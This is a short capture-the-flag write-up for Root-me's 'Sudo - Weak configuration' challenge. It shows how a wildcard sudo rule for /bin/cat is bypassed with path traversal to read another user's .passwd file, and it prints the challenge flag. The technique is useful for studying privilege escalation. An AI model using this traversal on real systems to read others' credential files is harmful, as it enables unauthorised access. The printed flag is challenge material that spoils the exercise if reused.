Rootme Sudo - Weak Configuration
Root-me.org
Sudo - Weak configuration
Privilege escalation
We’re not given a lot of information about this one beside that sudo has a weak configuration. Let’s start by seeing our sudo rights.
sudo -l
[sudo] password for app-script-ch1:
Matching Defaults entries for app-script-ch1 on challenge02:
env_reset, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin, !mail_always, !mail_badpass, !mail_no_host, !mail_no_perms, !mail_no_user
User app-script-ch1 may run the following commands on challenge02:
(app-script-ch1-cracked) /bin/cat /challenge/app-script/ch1/ch1/*
We can run /bin/cat on everything in ../ch1/ch1/ as app-script-ch1-cracked.
The file that we want to read is in
You have to read the .passwd located in the following PATH :
/challenge/app-script/ch1/ch1cracked/
We’ll run the command as the other user and go back to read the file in ch1cracked.
sudo -u app-script-ch1-cracked /bin/cat /challenge/app-script/ch1/ch1/../ch1cracked/.passwd
b3_c4r3full_w1th_sud0